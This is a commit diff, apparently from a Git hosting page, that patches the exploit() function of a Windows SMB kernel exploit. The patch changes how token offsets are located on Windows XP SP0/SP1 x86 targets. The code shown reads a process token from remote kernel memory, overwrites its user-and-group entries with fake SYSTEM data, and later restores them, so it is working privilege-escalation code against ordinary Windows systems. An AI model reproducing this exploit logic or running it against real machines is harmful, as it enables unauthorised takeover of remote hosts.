more complex fix
This commit is contained in:
zerosum0x0
@@ -867,15 +867,19 @@ def exploit(target, pipe_name):
|
|||||||
# copy Token data for restoration
|
# copy Token data for restoration
|
||||||
tokenData = read_data(conn, info, tokenAddr, 0x40*info['PTR_SIZE'])
|
tokenData = read_data(conn, info, tokenAddr, 0x40*info['PTR_SIZE'])
|
||||||
|
|
||||||
userAndGroupCount = unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET'])[0]
|
|
||||||
|
userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET']
|
||||||
|
userAndGroupCount = unpack_from('<I', tokenData, userAndGroupCountOffset)[0]
|
||||||
userAndGroupsAddr = unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET'])[0]
|
userAndGroupsAddr = unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET'])[0]
|
||||||
# hack to fix XP SP0 and SP1
|
# hack to fix XP SP0 and SP1
|
||||||
if info['os'] == 'WINXP' and info['arch'] == 'x86':
|
if info['os'] == 'WINXP' and info['arch'] == 'x86':
|
||||||
if userAndGroupCount > 4:
|
if userAndGroupCount > 4 or userAndGroupCount == 0: # check NULL too
|
||||||
print("Bad TOKEN offsets detected, performing workaround")
|
print("Bad TOKEN offsets detected, performing workaround")
|
||||||
userAndGroupCount = unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'])[0]
|
userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1']
|
||||||
|
userAndGroupCount = unpack_from('<I', tokenData, userAndGroupCountOffset)[0]
|
||||||
userAndGroupsAddr = unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'])[0]
|
userAndGroupsAddr = unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'])[0]
|
||||||
|
|
||||||
|
|
||||||
print('userAndGroupCount: 0x{:x}'.format(userAndGroupCount))
|
print('userAndGroupCount: 0x{:x}'.format(userAndGroupCount))
|
||||||
print('userAndGroupsAddr: 0x{:x}'.format(userAndGroupsAddr))
|
print('userAndGroupsAddr: 0x{:x}'.format(userAndGroupsAddr))
|
||||||
|
|
||||||
@@ -883,7 +887,7 @@ def exploit(target, pipe_name):
|
|||||||
# modify UserAndGroups info
|
# modify UserAndGroups info
|
||||||
fakeUserAndGroupCount, fakeUserAndGroups = create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr)
|
fakeUserAndGroupCount, fakeUserAndGroups = create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr)
|
||||||
if fakeUserAndGroupCount != userAndGroupCount:
|
if fakeUserAndGroupCount != userAndGroupCount:
|
||||||
write_data(conn, info, tokenAddr+info['TOKEN_USER_GROUP_CNT_OFFSET'], pack('<I', fakeUserAndGroupCount))
|
write_data(conn, info, tokenAddr+userAndGroupCountOffset, pack('<I', fakeUserAndGroupCount))
|
||||||
write_data(conn, info, userAndGroupsAddr, fakeUserAndGroups)
|
write_data(conn, info, userAndGroupsAddr, fakeUserAndGroups)
|
||||||
else:
|
else:
|
||||||
# the target can use PsImperonateClient for impersonation (Windows 2008 and later)
|
# the target can use PsImperonateClient for impersonation (Windows 2008 and later)
|
||||||
@@ -907,7 +911,7 @@ def exploit(target, pipe_name):
|
|||||||
userAndGroupsOffset = userAndGroupsAddr - tokenAddr
|
userAndGroupsOffset = userAndGroupsAddr - tokenAddr
|
||||||
write_data(conn, info, userAndGroupsAddr, tokenData[userAndGroupsOffset:userAndGroupsOffset+len(fakeUserAndGroups)])
|
write_data(conn, info, userAndGroupsAddr, tokenData[userAndGroupsOffset:userAndGroupsOffset+len(fakeUserAndGroups)])
|
||||||
if fakeUserAndGroupCount != userAndGroupCount:
|
if fakeUserAndGroupCount != userAndGroupCount:
|
||||||
write_data(conn, info, tokenAddr+info['TOKEN_USER_GROUP_CNT_OFFSET'], pack('<I', userAndGroupCount))
|
write_data(conn, info, tokenAddr+userAndGroupCountOffset, pack('<I', userAndGroupCount))
|
||||||
else:
|
else:
|
||||||
write_data(conn, info, secCtxAddr, secCtxData)
|
write_data(conn, info, secCtxAddr, secCtxData)
|
||||||
|
|
||||||
|
|||||||
Reference in New Issue
Block a user